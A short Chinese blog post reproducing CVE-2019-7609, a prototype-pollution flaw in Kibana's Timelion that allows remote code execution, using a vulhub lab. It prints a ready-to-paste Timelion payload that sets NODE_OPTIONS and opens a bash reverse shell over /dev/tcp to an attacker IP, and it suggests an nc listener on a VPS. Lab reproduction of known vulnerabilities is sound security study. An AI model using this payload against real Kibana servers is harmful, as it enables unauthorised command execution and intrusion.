Node.js_Kibana原型污染导致远程代码执行CVE-2019-7609

影响范围:

Kibana<5.6.15

Kibana<6.6.1

漏洞描述:

Kibana基于node.js实现

5.6.15 和 6.6.1 之前的 Kibana 版本在 Timelion 可视化器中包含任意代码执行缺陷。有权访问 Timelion 应用程序的攻击者可以发送尝试执行 JavaScript 代码的请求。这可能会导致攻击者使用主机系统上 Kibana 进程的权限执行任意命令。

复现操作步骤:

使用vulhub搭建靶场。

点击菜单栏中的Timelion功能,将反弹shell的payload填入并运行

payload:.es(*).props(label.proto.env.AAAA=‘require(“child_process”).exec(“bash -i >& /dev/tcp/192.168.111.1/7410 0>&1”);process.exit()//’)

.props(label.proto.env.NODE_OPTIONS=‘–require /proc/self/environ’)

如果是在线搭建的靶场反弹shell 的IP设置自己VPS上使用NC监听的,本地搭建的靶场改自己本地攻击机NC监听的

然后需要点击左边Canvas功能进行访问即可触发命令。

参考链接:

https://vulhub.org/#/environments/kibana/CVE-2019-7609/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值